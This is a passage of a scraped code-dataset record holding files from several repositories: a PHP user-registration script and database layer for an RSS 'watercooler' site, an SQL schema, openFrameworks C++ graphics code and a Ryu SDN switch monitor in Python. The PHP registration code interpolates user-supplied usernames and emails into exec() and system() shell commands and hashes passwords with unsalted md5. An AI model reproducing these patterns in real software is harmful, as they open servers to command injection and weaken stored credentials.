array();\n foreach ($_REQUEST['feed'] as $index=>$feed)\n\tif ($feed != '')\n\t $feedinfos[] = array('name'=>$feed,'url'=>$feed);\n if (count($feedinfos) > 0)\n\t$feeds = Feeds::create($feedinfos);\n }\n\n $emailPin = mt_rand(1000,9999);\n $smsPin = mt_rand(1000,9999);\n $userInfo = array('username'=>$userName, \n\t\t 'password'=>md5($userPassword), \n\t\t 'email'=>$userEmail, \n\t\t 'phone_number'=>$userCell, \n\t\t 'carrier'=>$_REQUEST['userCarrier'], \n\t\t 'send_email'=>$_REQUEST['receive_email'] === 'yes', \n\t\t 'send_sms_text'=>$_REQUEST['receive_sms_text'] === 'yes',\n\t\t 'send_sms_link'=>$_REQUEST['receive_sms_link'] === 'yes',\n\t\t 'email_pin'=>$emailPin,\n\t\t 'phone_pin'=>0,\n\t\t 'feeds'=>$feeds);\n \n if (($user = User::create($userInfo)) == NULL)\n {\n\n\techo '<p style=\"color:red\">User registration failed.</p>';\n\texit();\n }\n\n else\n {\n\tprint('<p style=\"color:navy\">Registration Successful!</p>');\n\n\t$hyperlink = 'confirm.php' . 
\"?id={$user->id}&pin={$emailPin}\";\n\t$EmailConfirmationString = \"python2.5 -c \\\"import EmailServer; EmailServer.sendConfirmEmail('{$page_uri_base}{$hyperlink}','{$user->username}','{$user->email}');\\\"\";\n\texec($EmailConfirmationString);\n\t//$SMSConfirmationString = \"python2.5 -c \\\"import EmailServer; EmailServer.sendConfirmSMS('{$user->phone_number}','{$user->carrier}','{$user->username}', '{$smsPin}');\\\"\";\n\t//exec($SMSConfirmationString);\n\n\n\n\n\n\n\n\t$rssString = \"/var/www/rss/{$user->username}.xml\";\n\t$rssTemplate = \"/var/www/rss/template.xml\";\n\n\n\t// initialize the feed to the template and set permissions\n\tsystem(\"cp {$rssTemplate} {$rssString}\");\n\tsystem(\"chmod g+w {$rssString}\");\n\n\t// set the default title\n\t$category = \"title\";\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$user->username}<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the default website\n\t$category = \"link\";\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>http:\\/\\/watercooler\\.geogriffin\\.info<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the default description\n\t$category = \"description\";\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>My feed<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the publishing date\n\t$category = \"lastBuildDate\";\n\t$date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T');\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$date}<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the last build date\n\t$category = \"lastBuildDate\";\n\t$date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T');\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$date}<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the default managing editor\n\t$category = \"managingEditor\";\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$user->email}<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\n\n\tprint('<p>You have been sent a confirmation email and text message. 
Please follow the instructions in the email and text message in order to enjoy full access to the Watercooler.</p>');\n\tprint('<a href=\"index.php\">Login here.</a>');\n\theader(\"Location: {$page_uri_base}success.php?email={$user->email}&cell={$user->phone_number}\");\n }\n }\n else\n {\n // this will be the default message if the form accessed without POSTing\n echo '<p style=\"color:navy;\">Please fill in the form below</p>';\n }\n\n?>\n" }, { "alpha_fraction": 0.782187819480896, "alphanum_fraction": 0.7826718091964722, "avg_line_length": 23.595237731933594, "blob_id": "ea0e90ddf98b232a2fbf6b55574828e7c07e8301", "content_id": "06b79c91e6fb17b21e9cabded8928c2ff86de8e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2066, "license_type": "no_license", "max_line_length": 60, "num_lines": 84, "path": "/www/trunk/SQLiteDB.sql", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "DROP TABLE IF EXISTS users;\nCREATE TABLE users\n(\nuid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\nusername TEXT NOT NULL UNIQUE,\npassword TEXT NOT NULL,\nfirst_name TEXT,\nlast_name TEXT,\nphone_number TEXT NOT NULL UNIQUE,\nemail TEXT NOT NULL UNIQUE,\nstatus INTEGER NOT NULL,\ncid INTEGER NOT NULL,\nFOREIGN KEY (cid) REFERENCES reception_methods\n);\n\nDROP TABLE IF EXISTS receptions;\nCREATE TABLE receptions\n(\nuid INTEGER NOT NULL,\nrid INTEGER NOT NULL,\nFOREIGN KEY (uid) REFERENCES users,\nFOREIGN KEY (rid) REFERENCES reception_methods\n);\n\nDROP TABLE IF EXISTS reception_methods;\nCREATE TABLE reception_methods\n(\nrid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\nmethod_type TEXT NOT NULL\n);\n\nDROP TABLE IF EXISTS carriors;\nCREATE TABLE carriors\n(\ncid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\ncarrior_name TEXT NOT NULL\n);\n\nDROP TABLE IF EXISTS favorites;\nCREATE TABLE favorites\n(\nuid INTEGER NOT NULL,\nsid INTEGER NOT NULL,\npriority INTEGER NOT NULL,\nFOREIGN KEY (uid) REFERENCES users,\nFOREIGN KEY (sid) REFERENCES feed_sources\n);\n\nDROP TABLE IF EXISTS feed_sources;\nCREATE TABLE feed_sources\n(\nsid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\nsource_name TEXT NOT NULL,\nsource_url TEXT NOT NULL\n);\n\nDROP TABLE IF EXISTS feed_stories;\nCREATE TABLE feed_stories\n(\nfid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\ntitle TEXT NOT NULL,\ncontent TEXT NOT NULL,\nurl TEXT NOT NULL,\ntime_stamp INTEGER NOT NULL,\nsid INTEGER NOT NULL,\ngid INTEGER NOT NULL,\nFOREIGN KEY (sid) REFERENCES feed_sources,\nFOREIGN KEY (gid) REFERENCES feed_categories\n);\n\nDROP TABLE IF EXISTS feed_categories;\nCREATE TABLE feed_categories\n(\ngid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\ncategory TEXT NOT NULL\n);\n\nINSERT INTO carriors (carrior_name) VALUES ('AT&T');\nINSERT INTO carriors (carrior_name) VALUES ('T-Mobile');\nINSERT INTO carriors (carrior_name) VALUES ('Verizon');\nINSERT INTO carriors (carrior_name) VALUES ('Sprint');\n\nINSERT INTO carriors (carrior_name) VALUES ('testcarrier');\nINSERT INTO carriors (carrior_name) VALUES ('testcarrier2');\n" }, { "alpha_fraction": 0.6383973956108093, "alphanum_fraction": 0.6391768455505371, "avg_line_length": 32.939151763916016, "blob_id": "0a50920bb70b9781553b23ec11bb37228a298825", "content_id": "f187af00d315c63ced1b816ea0cb33fb4e568a47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 12829, "license_type": "no_license", "max_line_length": 167, 
"num_lines": 378, "path": "/www/trunk/db_mysql_feeds.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\n\n/* class MySQLFeeds implements iFeeds on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLFeeds extends MySQLDBObject implements iFeeds {\n private $db;\n public $feeds;\n\n public function __construct(array $feeds, MySQLDB $db) {\n $this->feeds = $feeds;\n $this->db = $db;\n }\n\n/* MySQLFeeds::create implements iFeeds::create (see corresponding \n documentation)\n*/\n public static function create(array $feedinfos, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__create($feedinfos, $db);\n }\n\n /* MySQLFeeds::__create is a helper function to MySQLFeeds::create which\n performs the actual create operation. This function was added in order to \n use typehinting on parameter $db.\n */\n private static function __create(array $feedinfos, MySQLDB $db) {\n $feeds = array();\n foreach ($feedinfos as $feedinfo) {\n if (!isset($feedinfo['url']))\n\tthrow new InvalidArgumentException('$feedinfos requires url attr');\n $feed = MySQLFeed::find('url', $feedinfo['url'], $db);\n if ($feed === NULL)\n\t$feeds[] = MySQLFeed::create($feedinfo, $db);\n else\n\t$feeds[] = $feed;\n }\n $c = __CLASS__;\n return new $c($feeds, $db);\n }\n\n/* MySQLFeeds::searchPartial implements iFeeds::searchPartial (see \n corresponding documentation)\n*/\n public static function searchPartial($attr, $partial_value,\n\t\t\t\t iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchPartial($attr, $partial_value, $db);\n }\n\n public static function __searchPartial($attr, $partial_value,\n\t\t\t\t\t MySQLDB $db) {\n /* $valid_search_feedattrs is a list of attributes which can be used as\n the $attr parameter to this function. Keep this list updated with\n MySQLDBObject::$feedattrs_to_cols.\n */\n static $valid_search_feedattrs = \n array('name'=>TRUE, 'url'=>TRUE);\n\n if (isset($valid_search_feedattrs[$attr]))\n $db_attr = self::$feedattrs_to_cols[$attr];\n else\n throw new InvalidArgumentException('parameter $attr is not a valid '.\n\t\t\t\t\t 'attribute');\n\n $search_sql = \"SELECT sid FROM feed_sources WHERE $db_attr LIKE :value;\";\n $search_stmt = $db->pdo->prepare($search_sql);\n $search_stmt->bindValue(':value', \"%{$partial_value}%\");\n $search_stmt->execute();\n // set fetch mode to create instances of MySQLFeed\n $search_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', array($db));\n\n // fetch the result and create a new instance of this class\n $search_result = $search_stmt->fetchAll();\n if ($search_result !== FALSE) {\n $c = __CLASS__;\n return new $c($search_result, $db);\n } else\n return NULL; \n }\n\n/* MySQLFeeds::merge implements iFeeds::merge (see corresponding documentation)\n*/\n public function merge(iFeeds $feeds) {\n return self::__merge($feeds);\n }\n /* MySQLFeeds::__merge is a helper function to MySQLFeeds::merge which\n performs the actual merge operation. 
This function was added in order to\n use typehinting on parameter $feeds.\n */\n public function __merge(MySQLFeeds $feeds) {\n if ($this->db !== $feeds->db)\n throw new InvalidArgumentException('$db must match between objects');\n $c = __CLASS__;\n return new $c(array_merge($this->feeds, $feeds->feeds), $this->db);\n }\n\n public function sortByPopularity() {\n // XXX this is the slowest SQL query on the planet\n\n if (count($this->feeds) == 0)\n return;\n\n $get_result = array();\n\n // build SQL query\n $get_sql = \n 'SELECT feed_sources.sid, COUNT(favorites.uid) AS usercount FROM feed_sources LEFT JOIN favorites ON feed_sources.sid=favorites.sid WHERE feed_sources.sid IN (';\n // add story ids\n for ($i = 0; $i < count($this->feeds); $i++)\n $get_sql .= '?, ';\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= \n ') GROUP BY feed_sources.sid ORDER BY usercount DESC;';\n\n $get_stmt = $this->db->pdo->prepare($get_sql);\n // build an array of story ids\n foreach ($this as $feed)\n $ids[] = $feed->id;\n $get_stmt->execute($ids);\n $get_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', \n\t\t\t array('db'=>$this->db));\n $get_result = $get_stmt->fetchAll();\n if ($get_result === FALSE)\n throw new Exception('PDOStatement::fetchAll failed');\n\n $this->feeds = $get_result;\n }\n\n // these functions implement Iterator\n public function rewind() {\n reset($this->feeds);\n }\n public function current() {\n return current($this->feeds);\n }\n public function key() {\n return key($this->feeds);\n }\n public function next() {\n return next($this->feeds);\n }\n public function valid() {\n return ($this->current() !== FALSE);\n }\n}\n\n/* class MySQLFeed implements iFeed on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLFeed extends MySQLDBObject implements iFeed {\n private $db;\n /* $sid is the unique feed identifier which is used to access feed\n information in the database */\n public $sid;\n\n static $stories_attr = 'stories';\n\n /* function MySQLFeed::__construct is the constructor for the class\n\n $db: (MySQLDB object) a valid MySQLDB object connected to the MySQL\n database to use\n */\n public function __construct(MySQLDB $db) {\n $this->db = $db;\n }\n\n /* function MySQLFeed::__get is the PHP magic 'get' function for the class */\n public function __get($name) {\n $ret = $this->get(array($name));\n if ($ret === NULL || !isset($ret[$name]))\n return NULL;\n else\n return $ret[$name];\n }\n\n /* parseFeedInfo transforms a $feedinfo array, in the format taken by many\n iFeed functions, into an associative array with keys as database column\n names\n */\n private static function parseFeedInfo(array $feedinfo, MySQLDB $db) {\n /* $valid_feedinfo_attrs is a list of attributes from $feedinfo which can\n be handled by a simple column name transformation. 
Keep this list \n updated with MySQLDBObject::$feedattrs_to_cols.\n */\n static $valid_feedinfo_attrs = array('name'=>TRUE, 'url'=>TRUE);\n\n // rename the feedinfo keys as database column names\n foreach ($feedinfo as $key=>$value)\n if ($valid_feedinfo_attrs[$key] !== NULL)\n\t$db_feedinfo[self::$feedattrs_to_cols[$key]] = $value;\n\n return $db_feedinfo;\n }\n\n/* MySQLFeed::find implements iFeed::find (see corresponding documentation)\n*/\n public static function find($attr, $value, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__find($attr, $value, $db);\n }\n\n /* MySQLFeed::__find is a helper function to MySQLFeed::find which performs\n the actual find operation. This function was added in order to use\n typehinting on parameter $db.\n */\n private static function __find($attr, $value, MySQLDB $db) {\n /* $valid_find_feedattrs is a list of attributes from $feedinfo which can\n be used as input to this function. Keep this list updated with\n MySQLDBObject::$feedattrs_to_cols.\n */\n static $valid_find_feedattrs = \n array('id'=>TRUE, 'sid'=>TRUE, 'name'=>TRUE, 'url'=>TRUE);\n\n if (isset($valid_find_feedattrs[$attr]))\n $db_attr = self::$feedattrs_to_cols[$attr];\n else\n throw new InvalidArgumentException('parameter $attr is not a valid '.\n\t\t\t\t\t 'attribute');\n\n $find_sql = \"SELECT sid FROM feed_sources WHERE $db_attr=:value;\";\n $find_stmt = $db->pdo->prepare($find_sql);\n $find_stmt->bindParam(':value', $value);\n $find_stmt->execute();\n // set fetch mode to create an instance of this class\n $find_stmt->setFetchMode(PDO::FETCH_CLASS, __CLASS__, array('db'=>$db));\n $find_result = $find_stmt->fetch();\n return $find_result !== FALSE ? $find_result : NULL;\n }\n\n\n/* MySQLFeed::create implements iFeed::create (see corresponding documentation)\n*/\n public static function create(array $feedinfo, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__create($feedinfo, $db);\n }\n\n /* MySQLFeed::__create is a helper function to MySQLFeed::create which\n performs the actual create operation. 
This function was added in order to\n use typehinting on parameter $db.\n */\n public static function __create(array $feedinfo, MySQLDB $db) {\n // parse $feedinfo into a format able to be fed straight into database\n $db_feedinfo = self::parseFeedInfo($feedinfo, $db);\n \n // build the SQL query to use to replace the feed\n $create_sql = 'INSERT IGNORE INTO feed_sources (';\n // add column names\n foreach ($db_feedinfo as $col=>$value)\n $create_sql .= $col.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n // add column values\n $create_sql .= ') VALUES (';\n foreach ($db_feedinfo as $col=>$value)\n $create_sql .= ':'.$col.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n $create_sql .= ');';\n \n // prepare the SQL statement\n $create_stmt = $db->pdo->prepare($create_sql);\n \n // bind column values\n foreach ($db_feedinfo as $col=>$value)\n $create_stmt->bindValue(':'.$col, $value);\n \n // execute the SQL statement\n $create_stmt->execute();\n\n return MySQLFeed::find('url', $feedinfo['url'], $db);\n }\n\n /* MySQLFeed::getStories is a written as a helper function to MySQLFeed::get\n which carries out the operation of getting a feed's stories\n\n returns a MySQLStories object representing the set of the feed's stories\n */\n private function getStories() {\n static $stories_sql = 'SELECT fid FROM feed_stories WHERE sid=:sid;';\n $stories_stmt = $this->db->pdo->prepare($stories_sql);\n $stories_stmt->bindParam(':sid', $this->sid);\n $stories_stmt->execute();\n /* XXX creating the objects this way relies on DB consistency (sid is not\n checked to be existent in feed_sources table) */\n $stories_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLStory', \n\t\t\t array('db'=>$this->db));\n $stories_result = $stories_stmt->fetchAll();\n return new MySQLStories($stories_result, $this->db);\n }\n\n/* MySQLFeed::get implements iFeed::get (see corresponding documentation)\n*/\n public function get(array $feedattrs) {\n /* $valid_feedattrs is a list of attributes from $feedattrs which can be\n handled by the simple sql query generator below. 
Keep this list updated\n with MySQLDBObject::$feedattrs_to_cols.\n */\n static $valid_feedattrs = array('name'=>TRUE, 'url'=>TRUE);\n\n $sql_added = FALSE;\n $get_result = array();\n\n // build SQL query to use to get feed attributes\n $get_sql = 'SELECT ';\n // add column names\n foreach ($feedattrs as $key=>$attr) {\n if (isset($valid_feedattrs[$attr])) {\n\t$get_sql .= self::$feedattrs_to_cols[$attr].\" AS $attr, \";\n\t$sql_added = TRUE;\n }\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM feed_sources WHERE sid=:sid;';\n\n // do not attempt the SELECT if no attrs were added to the select\n if ($sql_added === TRUE) {\n $get_stmt = $this->db->pdo->prepare($get_sql);\n $get_stmt->bindParam(':sid', $this->sid);\n\n $get_stmt->execute();\n $get_result = $get_stmt->fetch(PDO::FETCH_ASSOC);\n if ($get_result === FALSE)\n\tthrow new Exception('PDOStatement::fetch failed');\n }\n\n // get id if requested\n if (in_array('id', $feedattrs))\n $get_result['id'] = $this->sid;\n if (in_array('sid', $feedattrs))\n $get_result['sid'] = $this->sid;\n\n // get stories if requested\n if (in_array(self::$stories_attr, $feedattrs))\n $get_result[self::$stories_attr] = $this->getStories();\n\n return $get_result;\n }\n\n/* MySQLFeed::delete implements iFeed::delete (see corresponding documentation)\n*/\n public function delete() {\n // build the SQL query to use to delete the feed\n static $delete_sql = 'DELETE FROM feed_sources WHERE sid=:sid;';\n // prepare the SQL statement\n $delete_stmt = $this->db->pdo->prepare($delete_sql);\n // bind column values\n $delete_stmt->bindValue(':sid', $this->sid);\n // execute the SQL statement\n $delete_stmt->execute();\n\n /* unset $this->sid so that future operations on this MySQLFeed object\n will fail */\n unset($this->sid);\n }\n\n/* MySQLFeed::getUserCount implements iFeed::getUserCount (see corresponding \n documentation)\n*/\n public function getUserCount() {\n static $usercount_sql = 'SELECT COUNT(uid) FROM favorites WHERE sid=:sid;';\n $usercount_stmt = $this->db->pdo->prepare($usercount_sql);\n $usercount_stmt->bindParam(':sid', $this->sid);\n $usercount_stmt->execute();\n return $usercount_stmt->fetchColumn();\n }\n}\n" } ]
38
hammertux/ip-2019
https://github.com/hammertux/ip-2019
ebf5bf8a1d6e8f4f4fb6d7cbe438c033908f3225
030a95ffff57ddc12560afe8b452e69a9d9fa29a
57b5578e34eb7554426d40405b78d3965d3a43b7
refs/heads/master
2022-03-29T16:17:09.255821
2019-11-25T15:59:54
2019-11-25T15:59:54
221,927,358
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6502525210380554, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28.700000762939453, "blob_id": "64f711beca71bcb6e41949f77055ee97177ec699", "content_id": "91de1a7a2d8af6a2ed8de0bceac2ac9230920e1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2376, "license_type": "no_license", "max_line_length": 88, "num_lines": 80, "path": "/lab1/lab1/switch_monitor.py", "repo_name": "hammertux/ip-2019", "src_encoding": "UTF-8", "text": "from operator import attrgetter\n\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.lib import hub\n\n# This is the learning switch you have already created\n# Now you extend the learning switch with monitoring capability\nfrom learning_switch import LearningSwitch13\n\n\n# The switch monitor function extends the learning switch\nclass SwitchMonitor13(LearningSwitch13):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(SwitchMonitor13, self).__init__(*args, **kwargs)\n\n\t\tself.datapaths = {}\n\n\t\tself.monitor_thread = hub.spawn(self._monitor)\n\n\t@set_ev_cls(ofp_event.EventOFPStateChange, [MAIN_DISPATCHER, DEAD_DISPATCHER])\n\tdef _state_change_handler(self, ev):\n\t\tdatapath = ev.datapath\n\t\tstate = ev.state\n\n\t\tif state == MAIN_DISPATCHER:\n\t\t\tif datapath.id not in self.datapaths:\n\t\t\t\tself.datapaths[datapath.id] = datapath\n\t\telse:\n\t\t\tif datapath.id == DEAD_DISPATCHER:\n\t\t\t\tdel self.datapaths[datapath.id]\n\n\tdef _monitor(self):\n\n\t\twhile True:\n\t\t\tfor dp in self.datapaths.values():\n\t\t\t\tself._request_stats(dp)\n\t\t\thub.sleep(5)\n\n\tdef _request_stats(self, datapath):\n\t\tself.logger.debug('send stats request: %016x', datapath.id)\n\t\tofproto = datapath.ofproto\n\t\tparser = datapath.ofproto_parser\n\n\t\trequest = parser.OFPFlowStatsRequest(datapath)\n\t\tdatapath.send_msg(request)\n\n\t\t# Handle flow stats information from the datapaht\n\t@set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)\n\tdef _flow_stats_reply_handler(self, ev):\n\n\t\tbody = ev.msg.body\n\t\tdpid = ev.msg.datapath.id\n\n\t\tcounters1 = []\n\t\tcounters2 = []\n\n\t\t# need to monitor datapath 1 and datapath 2\n\t\tfor flow in body:\n\t\t\t\tmatch = flow.match\n\t\t\t\tif flow.priority != 0 and (match['in_port'] == 1 and dpid == 1):\n\t\t\t\t\tcounters1.append(flow.packet_count)\n\t\t\t\tif flow.priority != 0 and (dpid == 2 and flow.instructions[0].actions[0].port == 3):\n\t\t\t\t\tcounters2.append(flow.packet_count)\n\n\n\t\tsum = 0\n\t\tif dpid == 1:\n\t\t\tfor i in range(0, len(counters1)):\n\t\t\t\tsum = sum + counters1[i]\n\t\t\tprint(\"-------- -------- -------- -------- \")\n\t\t\tprint(\"incoming from h1 on switch s1 = \" + str(sum))\n\n\n\t\tif dpid == 2:\n for i in range(0, len(counters2)):\n sum = sum + counters2[i]\n\t\t\tprint(\"outgoing to h3 on switch s2 = \" + str(sum))\n\t\t\tprint(\"-------- -------- -------- -------- \")\n" } ]
1
Opensemble/lhcvmm
https://github.com/Opensemble/lhcvmm
0b57b0ddb30abc1e3aef123208c1e53bbe673935
355f2523ba0f7530bf6c41b8ab35e520233eb6dd
fe9667bbfa7d642f023d8b09be2ec4a3816039c0
refs/heads/master
2020-04-15T15:21:30.190247
2016-09-08T14:16:45
2016-09-08T14:16:45
46,009,373
7
4
null
2015-11-11T20:56:54
2015-12-14T18:02:21
2015-12-14T18:40:27
null
[ { "alpha_fraction": 0.4863192141056061, "alphanum_fraction": 0.4970684051513672, "avg_line_length": 24.558332443237305, "blob_id": "83fe81fef070291c16675142a7063d5597f514fa", "content_id": "1802e1bc9e2d6224be445de6686d91e854b43184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3070, "license_type": "no_license", "max_line_length": 98, "num_lines": 120, "path": "/Graphics/addons/ofxFisheye/src/ofxFisheye.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"ofxFisheye.h\"\n\nvoid ofxFisheye::setup(fxType type = tVariableFisheye){\n \n \n //load shaders------------\n #ifdef TARGET_OPENGLES\n ofLogError(\"NOT AVAILABLE SHADERS FOR THIS RENDERER\");\n #else\n if(ofIsGLProgrammableRenderer()){\n ofLogError(\"NOT AVAILABLE SHADERS FOR THIS RENDERER\");\n }else{\n \n fixFishShader.setupShaderFromSource(GL_FRAGMENT_SHADER, fixFisheye.gl2FragmentShader);\n fixFishShader.bindDefaults();\n fixFishShader.linkProgram();\n \n barrelShader.setupShaderFromSource(GL_FRAGMENT_SHADER, barrelDist.gl2FragmentShader);\n barrelShader.bindDefaults();\n barrelShader.linkProgram();\n \n varFishShader.setupShaderFromSource(GL_FRAGMENT_SHADER, varFisheye.gl2FragmentShader);\n varFishShader.bindDefaults();\n varFishShader.linkProgram();\n \n ofLogNotice(\"ofxFisheye: Shaders loaded.\");\n }\n #endif\n //------------------------\n setFxType(type);\n \n}\n//---------------------------------\nvoid ofxFisheye::update(){\n\n}\n//---------------------------------\nvoid ofxFisheye::draw(){\n\n}\n//--------------------------------\nvoid ofxFisheye::exit(){\n\n}\n//---------------------------------\nvoid ofxFisheye::begin(ofTexture& fboTexture, int w, int h, float amount){\n \n float amnt = ofClamp(amount, 0.0, 1.0);;\n \n switch (currentFxType) {\n case tFixFisheye:\n amnt *= 180;//0 a 180\n break;\n case tBarrelDist:\n amnt *= 4.0;//0 a 2\n break;\n case tVariableFisheye:\n amnt = amnt*2 - 1.0;// (-1,1)\n amnt*=0.5;//(-0.5,0.5)\n break;\n \n default:\n break;\n }\n \n \n currentShader->begin();\n currentShader->setUniformTexture(\"tex\", fboTexture, 0);\n currentShader->setUniform1f(\"width\", w);\n currentShader->setUniform1f(\"height\", h);\n currentShader->setUniform1f(\"amount\", amnt);\n}\n//---------------------------------\nvoid ofxFisheye::end(){\n currentShader->end();\n}\n//---------------------------------\nvoid ofxFisheye::setFxType(fxType type){\n \n currentFxType = type;\n \n switch (currentFxType) {\n \n case tFixFisheye:\n currentShader = &fixFishShader;\n break;\n case tBarrelDist:\n currentShader = &barrelShader;\n break;\n case tVariableFisheye:\n currentShader = &varFishShader;\n break;\n \n default:\n break;\n }\n \n}\n//---------------------------------\nstring ofxFisheye::getFxTypeAsString(){\n \n string s;\n \n switch (currentFxType) {\n case tFixFisheye:\n s = \"FIX Fisheye\";\n break;\n case tVariableFisheye:\n s = \"VARIABLE Fisheye\";\n break;\n case tBarrelDist:\n s = \"Barrel Distortion\";\n break;\n \n default:\n break;\n }\n \n return s;\n}\n\n\n" }, { "alpha_fraction": 0.6128625273704529, "alphanum_fraction": 0.6216897964477539, "avg_line_length": 18.580245971679688, "blob_id": "22adfa5a8520ced72b08a6fa7bb1ab3fe2c873a2", "content_id": "a3e25a636546a268e2e51b1cd0cacde083d0eb1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1586, "license_type": "no_license", "max_line_length": 80, "num_lines": 81, "path": 
"/Graphics/apps/videoTest_3/src/particleSystem/ParticleSystemPair.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#pragma once\n\n#include \"ofMain.h\"\n\n#include \"ParticleGroupSystem.h\"\n\n\nenum PairType{\n IN,\n OUT\n};\n\nclass ParticleSystemPair{\n \npublic:\n \n void setup(int x, int y, int w, int h, PairType type);\n void update(std::map<string, float>& data1, std::map<string, float>& data2);\n void drawScene();\n \n void reset(int x, int y, int w, int h);\n \n void checkAndDrawGroupUnions();\n \n void drawSolidMesh(ParticleGroup *group1, ParticleGroup *group2);\n void drawLineStructure(ParticleGroup *group1, ParticleGroup *group2);\n \n void addPartGroup(int ch);\n \n \n \n void setDistanceTreshold(float tresh){_distanceTreshold = tresh;}\n void setGroupPartsNum(int num){_groupPartsNum = num;}\n void setIsContinuum(bool state, float rate_ms = 500.0);\n void setDoRandom(bool state){\n _bDoRandom = state;\n system_1.setDoAddRandom(state);\n system_2.setDoAddRandom(state);\n }\n \n void setColor(ofColor col);\n \n bool getIsContinuum(){return _bIsContinuum;}\n bool getIsDoingRandom(){return _bDoRandom;}\n int getPartsNum();\n \n ParticleGroupSystem system_1, system_2;\n \n int _x, _y;\n int _w, _h;\n\nprivate:\n //parameters\n float _distanceTreshold;\n int _groupPartsNum;\n \n PairType _type;\n \n ofShader lineShader;\n ofShader phongShader;\n \n bool _bIsContinuum;\n float continuumTimer;\n float lastTimer;\n float _continuum_rate_ms;\n float _bDoRandom;\n \n ofMaterial material;\n \n ofColor _mainColor;\n \n \n \n \n \n \n \n \n \n\n};" }, { "alpha_fraction": 0.6501364707946777, "alphanum_fraction": 0.658325731754303, "avg_line_length": 26.148147583007812, "blob_id": "7a10353aeaea8ad60cb7d36a5279f074412ac678", "content_id": "389ee5a325fa7275a16368866ee7ca0caf693d1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2198, "license_type": "no_license", "max_line_length": 163, "num_lines": 81, "path": "/Graphics/apps/videoTest_3/src/VideoRenderer.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n * VideoRenderer.h\n * Renderer de contexto openGL a \"Secuencia PNG\" o Archivo de video\n * Creado utilizando el addon ofxVideoRecorder(https://github.com/timscaffidi/ofxVideoRecorder)\n * Y el ejemplo de openFrameworks threadedPixelBufferExample (https://github.com/openframeworks/openFrameworks/tree/master/examples/gl/threadedPixelBufferExample)\n */\n\n#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxVideoRecorder.h\"\n#include \"ImageSaverThread.h\"\n\nenum RecordingMode{\n PNG_SEQUENCE,\n MOV_FILE\n};\n\nenum Resolution{\n r256,\n r512,\n r1024,\n r2048,\n r4096\n};\n\nclass VideoRenderer{\n\n public:\n \n void setup(int iFramerate, RecordingMode initMode, Resolution initRes);\n void update();\n void draw(int x, int y, int w, int h);\n void exit();\n \n void recordingComplete(ofxVideoRecorderOutputFileCompleteEventArgs& args);\n \n \n void startRecording();\n void stopRecording();\n \n void setOutputResolution(Resolution res);\n void setRecordingMode(RecordingMode mode){currentRecMode = mode;}\n \n \n ofFbo* getFbo(){return &fbo;}\n int getFboWidth(){return fbo.getWidth();}\n int getFboHeight(){return fbo.getHeight();}\n bool getIsRecording(){return 